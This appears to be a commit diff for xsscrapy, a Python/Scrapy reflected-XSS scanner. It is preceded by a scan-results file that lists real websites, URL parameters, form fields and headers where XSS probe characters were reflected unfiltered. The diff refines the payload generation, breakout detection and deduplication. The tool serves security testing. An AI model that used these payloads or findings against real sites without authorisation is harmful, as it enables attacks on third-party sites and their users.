Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_7b3714174bc1c41046e57bd0a44bdc70"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx"()=<>9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx"()=<>9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx"()=<>9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx"()=<>9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx'"(){}[];9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx'"(){}[];9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: page
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=1406272459.2538&amp;page=9zqjx"()=<>9zqjx#listing_23">Back to Results</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx'"(){}[];9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx'"(){}[];9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: page
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=1406272459.2538&amp;page=9zqjx'"(){}[];9zqjx#listing_23">Back to Results</a>
URL: http://help.yandex.com/mail/
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx"()=&lt;&gt;9zqjx" — Yandex.Help</title>
Line: <span class="b-form-input__box"><input value='9zqjx"()=&lt;&gt;9zqjx' class="b-form-input__input" id="search" name="text" maxlength="400" tabindex="1"><span class="b-form-input__clear b-form-input__clear_visibility_visible"></span></span>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx"()=&lt;&gt;9zqjx"</h1></div><div class="b-static-text">
URL: http://help.yandex.com/webmaster/controlling-robot/robots-txt.xml
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx"()=&lt;&gt;9zqjx" — Yandex.Help</title>
Line: <span class="b-form-input__box"><input value='9zqjx"()=&lt;&gt;9zqjx' class="b-form-input__input" id="search" name="text" maxlength="400" tabindex="1"><span class="b-form-input__clear b-form-input__clear_visibility_visible"></span></span>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx"()=&lt;&gt;9zqjx"</h1></div><div class="b-static-text">
URL: http://help.yandex.com/webmaster/controlling-robot/robots-txt.xml
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx'"(){}[];9zqjx" — Yandex.Help</title>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx'"(){}[];9zqjx"</h1></div><div class="b-static-text">
URL: https://helpx.adobe.com/jp/creative-cloud-enterprise.html
Unfiltered: ";
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: form
Injection point: form field names: area, q, y, lr, hl, searchterm, x, lbl
URL: http://kadira.com/blog.php?CA=Abril+2006&DAT=April+2006
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Abril+2014&DAT=April+2014
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=0&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=0&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: https://google-gruyere.appspot.com/855589874918/snippets.gtl?uid=brie
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: uid
Line: 9zqjx'"(){}[];9zqjx
Line: onclick='_refreshSnippets("855589874918", "9zqjx'"(){}[];9zqjx")'
Line: 9zqjx'"(){}[];9zqjx
URL: https://google-gruyere.appspot.com/855589874918/snippets.gtl?uid=brie
Unfiltered: '()=<>
Payload: '()=<>
Type: url
Injection point: uid
Line: 9zqjx'()=<>9zqjx
Line: onclick='_refreshSnippets("855589874918", "9zqjx'()=<>9zqjx")'
Line: 9zqjx'()=<>9zqjx
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Noviembre+2007&DAT=November+2007
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Mayo+2012&DAT=May+2012
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: Referer
Line: Referer: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: User-Agent
Line: User-Agent: 9zqjx()=<>9zqjx <br />
URL: http://www.kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://www.kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>

28
xsscrapy/pipelines.py
View File

@@ -27,16 +27,34 @@ class XSS_pipeline(object):
# If the injection param, the url up until the injected param and the payload
# are all the same as a previous item, then don't bother creating the item
# Match injection points
# Match tags where injection point was found
if item['inj_point'] == i['inj_point']:
# Match the URL up until the injected param
injected_var = item['inj_point']+'='
if item['url'].split(injected_var, 1)[0] == i['url'].split(injected_var, 1)[0]:
# Match the URL up until the params
if item['url'].split('?', 1)[0] == i['url'].split('?', 1)[0]:
# Match the payload
if item['xss_payload'] == i['xss_payload']:
raise DropItem('Duplicate item found: %s' % item['url'])
# Match the unfiltered characters
if item['unfiltered'] == i['unfiltered']:
raise DropItem('Duplicate item found: %s' % item['url'])
self.url_param_xss_items.append(item)
self.write_to_file(item)
return item
def write_to_file(self, item):
with open('formatted_vulns.txt', 'a+') as f:
f.write('\n')
f.write('URL: '+item['url']+'\n')
f.write('Unfiltered: '+item['unfiltered']+'\n')
f.write('Payload: '+item['xss_payload']+'\n')
f.write('Type: '+item['xss_type']+'\n')
f.write('Injection point: '+item['inj_point']+'\n')
for line in item['line']:
f.write('Line: '+line[1]+'\n')

2
xsscrapy/settings.py
View File

@@ -28,7 +28,7 @@ ITEM_PIPELINES = {'xsscrapy.pipelines.XSS_pipeline':100} # Look into what the 10
FEED_FORMAT = 'csv'
FEED_URI = 'vulnerable-urls.txt'
#COOKIES_DEBUG = True
COOKIES_DEBUG = True
# Test for injection via headers
#DEFAULT_REQUEST_HEADERS = {'Referer': '9zqjx', 'User-Agent':'9zqjx'}

181
xsscrapy/spiders/xss_spider.py
View File

@@ -1,3 +1,5 @@
# -- coding: utf-8 --
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
@@ -24,7 +26,7 @@ import requests
#
#w3lib.url.safe_url_string = new_safe_url_string
#from IPython import embed
from IPython import embed
__author__ = 'Dan McInerney danhmcinerney@gmail.com'
@@ -34,7 +36,8 @@ cookie
data control?
TO DO
-add DOM detection (pretty easy, just use those regexs from google domwikixss)
-add DOM detection or static js analysis (check retire.js project)
-the variable payload starts as the encoded payload and is eventually unescaped but not everuwhere?
-cleanup xss_chars_finder(self, response)
-prevent Requests from being URL encoded (line 57 of __init__ in Requests class)
@@ -58,6 +61,8 @@ class XSSspider(CrawlSpider):
self.redir_pld = 'JaVAscRIPT:prompt(99)'
#attr_pld = generated once injection points are found (requires checking if single or double quotes ends html attribute values)
self.form_requests_made = set()
self.header_requests_made = set()
self.url_requests_made = set()
self.login_user = kwargs.get('user')
self.login_pass = kwargs.get('pw')
@@ -68,6 +73,7 @@ class XSSspider(CrawlSpider):
base_url = u.scheme+'://'+u.hostname
robots_url = base_url+'/robots.txt'
robot_req = [Request(robots_url, callback=self.robot_parser, meta={'base_url':base_url})]
reqs = self.parse_resp(response)
reqs += robot_req
return reqs
@@ -129,6 +135,9 @@ class XSSspider(CrawlSpider):
payload = self.test_str
payloads = [payload]
# Get any cookies (logic of this still needs working out)
#cookies = response.headers.getlist('Set-Cookie')
# Edit a few select headers with injection string and resend request
headers = ['Referer', 'User-Agent']
header_reqs = self.make_header_reqs(orig_url, payloads, headers, quote_enclosure, None)
@@ -266,6 +275,12 @@ class XSSspider(CrawlSpider):
for params in modded_params[payload]:
joinedParams = urllib.urlencode(params, doseq=1) # doseq maps the params back together
newURL = urllib.unquote(protocol+hostname+path+'?'+joinedParams)
# Prevent URL dupes since we have dont_filter set to True for payloaded urls
if set(newURL).issubset(self.url_requests_made):
continue
self.url_requests_made.add(newURL)
for p in params:
if p[1] == payload:
changed_value = p[0]
@@ -273,8 +288,6 @@ class XSSspider(CrawlSpider):
if len(payloaded_urls) > 0:
return payloaded_urls
else:
return
def getURLparams(self, url):
''' Parse out the URL parameters '''
@@ -374,11 +387,11 @@ class XSSspider(CrawlSpider):
def xss_str_generator(self, injections, quote_enclosure, inj_type):
''' This is where the injection points are analyzed and specific payloads are created '''
event_attrs = self.event_attributes()
attr_pld = quote_enclosure+self.tag_pld
payloads = []
for i in injections:
# print i
line, tag, attr, attr_val = self.parse_injections(i)
if attr:
@@ -386,6 +399,10 @@ class XSSspider(CrawlSpider):
if attr == 'href' and attr_val == self.test_str:
if self.redir_pld not in payloads:
payloads.append(self.redir_pld)
# Test for javacsript running attributes
if attr in event_attrs:
if self.js_pld not in payloads:
payloads.append(self.js_pld)
# Test for normal attribute-based XSS (needs either ' or " to be unescaped depending on which char the value is wrapped in
if attr_pld not in payloads:
@@ -405,11 +422,18 @@ class XSSspider(CrawlSpider):
if self.tag_pld in payloads and attr_pld in payloads:
payloads.remove(self.tag_pld)
for p in payloads:
if 'h' in payloads:
print '***PAYLOADS:', p
if inj_type == 'url':
payloads.append(urllib.quote_plus(payloads[0]))
payloads = self.delim_payloads(payloads)
if len(payloads) > 0:
for p in payloads:
if 'h' in payloads:
print '***PAYLOADS:', p
return payloads
else:
return
@@ -430,7 +454,6 @@ class XSSspider(CrawlSpider):
# namely: meta tag with content attr, a tag with href attribute (onmouseover payload), option tag any attr (onmouseover payload)
item = vuln()
event_attrs = self.event_attributes()
xss_type = response.meta['type']
orig_url = response.meta['orig_url']
injections = response.meta['injections']
@@ -440,9 +463,11 @@ class XSSspider(CrawlSpider):
body = response.body
# Regex: ( ) mean group 1 is within the parens, . means any char, {1,25} means match any char 1 to 25 times
chars_between_delims = '%s(.{1,25})%s' % (self.test_str, self.test_str) # self.js_pld is 21 chars, so added a little extra space
orig_payload = response.meta['payload'].strip(self.test_str) # xss char payload
payload = self.unescape_payload(orig_payload)
inj_num = len(injections)
mismatch = False
orig_payload = response.meta['payload'].strip(self.test_str) # xss char payload
escaped_payload = self.unescape_payload(orig_payload)
break_tag_chars = set(['>', '<',])
break_attr_chars = set([quote_enclosure])
@@ -451,61 +476,53 @@ class XSSspider(CrawlSpider):
matches = re.findall(chars_between_delims, body)
if matches:
xss_num = len(matches)
else:
xss_num = 0
if xss_num > 0:
if xss_num != inj_num:
item['xss_type'] = 'Error '+str(xss_type)
item['inj_point'] = 'Error '+str(inj_point)
item['xss_payload'] = 'Error '+str(orig_payload)
item['url'] = 'Error '+str(orig_url)
mismatch = True
err = ('Mismatch between harmless injection count and payloaded injection count: %d vs %d' % (inj_num, xss_num))
item['error'] = err
unfiltered_chars = self.get_unfiltered_chars(matches, payload)
if unfiltered_chars:
for idx, i in enumerate(injections):
line, tag, attr, attr_val = self.parse_injections(i)
for idx, match in enumerate(matches):
unfiltered_chars = self.get_unfiltered_chars(match, escaped_payload)
if unfiltered_chars:
try:
c = unfiltered_chars[idx] # c = set of characters found at injection point
line, tag, attr, attr_val = self.parse_injections(injections[idx])
except IndexError:
# Mismatch in num of test injections and num of payloads found
# I feel like I could put a break instead of a continue here but I am so fearful of false negatives
continue
break
joined_chars = ''.join(c)
chars = set(c)
line = self.get_inj_line(body, joined_chars, item)
joined_chars = ''.join(unfiltered_chars)
chars = set(joined_chars)
line_html = self.get_inj_line(body, match, item)
###### XSS RULES ########
# Redirect
if self.redir_pld.lower() == payload.lower(): #redir
if 'javascript:prompt(99)' == joined_chars.lower():
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
if 'javascript:prompt(99)' == joined_chars.lower(): # redir
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# JS breakout
if self.js_pld == payload: #js chars
if self.js_pld == escaped_payload: #js chars
if break_js_chars.issubset(chars):
if '\\' not in chars:
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Attribute breakout
if attr:
if quote_enclosure in payload:
# Must pass a string search for the test+unesc_payload+test in at least one line of html and cannot be a mismatch
#if line_html and mismatch == False:
if quote_enclosure in escaped_payload:
if break_attr_chars.issubset(chars):
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Tag breakout
else:
if '<' and '>' in payload:
if '<' and '>' in escaped_payload:
if break_tag_chars.issubset(chars):
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Check the entire body for exact match
if payload in body:
#item['line'] = self.get_inj_line(body, payload, item)
if escaped_payload in body:
item['line'] = self.get_inj_line(body, escaped_payload, item)
item['xss_payload'] = orig_payload
item['unfiltered'] = payload
item['inj_point'] = inj_point
@@ -517,8 +534,12 @@ class XSSspider(CrawlSpider):
lines = []
html_lines = body.splitlines()
for idx, line in enumerate(html_lines):
line = line.strip()
if payload in line:
lines += (idx, line)
if len(line) > 500:
line = line[:200]+'...'
num_txt = (idx, line)
lines.append(num_txt)
if len(lines) > 0:
return lines
@@ -526,7 +547,7 @@ class XSSspider(CrawlSpider):
def make_item(self, joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item):
''' Create the vulnerable item '''
#item['line'] = line
item['line'] = line
item['xss_type'] = xss_type
item['xss_payload'] = orig_payload
item['unfiltered'] = joined_chars
@@ -546,23 +567,23 @@ class XSSspider(CrawlSpider):
return line, tag, attr, attr_val
def get_unfiltered_chars(self, matches, payload):
def get_unfiltered_chars(self, match, escaped_payload):
''' Check for the special chars and append them to a master list of tuples, one tuple per injection point '''
unfiltered_chars = []
found_chars = []
for m in matches:
for c in payload:
if c in m:
found_chars.append(c)
if len(found_chars) > 0:
unfiltered_chars.append(found_chars)
found_chars = []
# Make sure js payloads remove escaped ' and "
#if escaped_payload == self.js_pld:
escaped_chars = re.findall(r'\\(.)', match)
for escaped_char in escaped_chars:
if escaped_char not in ['x', 'u']: # x and u for hex and unicode \x43, \u0022
match = match.replace(escaped_char, '')
for c in escaped_payload:
if c in match:
unfiltered_chars.append(c)
if len(unfiltered_chars) > 0:
return unfiltered_chars
else:
return
def unescape_payload(self, payload):
''' Unescape the various payload encodings (html and url encodings)'''
@@ -572,6 +593,7 @@ class XSSspider(CrawlSpider):
payload = urllib.unquote_plus(payload)
# only html-encoded payloads will have & in them
payload = HTMLParser.HTMLParser().unescape(payload)
return payload
def parse_attr_xpath(self, xpath):
@@ -646,28 +668,37 @@ class XSSspider(CrawlSpider):
return event_attributes
def make_url_reqs(self, orig_url, payloaded_urls, quote_enclosure, injections):
''' Make the URL requests and filter out dupes '''
reqs = [Request(url[0],
meta={'type':'url',
'inj_point':url[1],
'orig_url':orig_url,
'payload':url[2],
'quote':quote_enclosure},
dont_filter = True)
'quote':quote_enclosure})
for url in payloaded_urls] # Meta is the payload
reqs = self.add_callback(injections, reqs)
for url in payloaded_urls:
if url[2] == self.test_str:
break
print 'payload:', url[2]
if len(reqs) > 0:
for r in reqs:
# Make sure we're only showing payloaded URLs, not tester URLs
if r.callback == self.xss_chars_finder:
self.log('Sending payloaded URL: '+r.url)
else:
break
reqs = self.add_callback(injections, reqs)
reqs = self.add_dupe_filter(reqs)
if reqs:
return reqs
else:
return
def add_dupe_filter(self, reqs):
for r in reqs:
# Make sure we're only showing payloaded URLs, not tester URLs
if r.callback == self.xss_chars_finder:
# Don't filter payloaded ones, but do filter reqs with the payload == self.test_str
r.dont_filter = True
self.log('Sending payloaded URL: '+r.url)
else:
break
return reqs
def make_header_reqs(self, url, payloads, headers, quote_enclosure, injections):
''' Generate header requests '''
@@ -682,6 +713,7 @@ class XSSspider(CrawlSpider):
dont_filter=True)
for header in headers for payload in payloads]
reqs = self.remove_header_dupes(reqs)
reqs = self.add_callback(injections, reqs)
if len(reqs) > 0:
@@ -696,6 +728,25 @@ class XSSspider(CrawlSpider):
else:
return
def remove_header_dupes(self, reqs):
''' Put all header requests made into a tuple of (url, header, payload) and
compare new header requests to this master set to prevent dupes '''
new_reqs =[]
for r in reqs:
for h in r.headers:
header = h # Referer or User-Agent
break
payload = r.headers[header]
u_h_p = (r.url, header, payload)
if set(u_h_p).issubset(self.header_requests_made):
continue
else:
self.header_requests_made.add(u_h_p)
new_reqs.append(r)
if len(reqs) > 0:
return new_reqs
def add_callback(self, injections, reqs):
''' Add the callback to the requests depending on if it's a test req or payloaded req '''
@@ -795,7 +846,3 @@ class XSSspider(CrawlSpider):
return reqs
else:
return
############################################################################################
#if not p == self.redir_pld:
# payload_list.append(self.test_str+urllib.quote_plus(p)+self.test_str)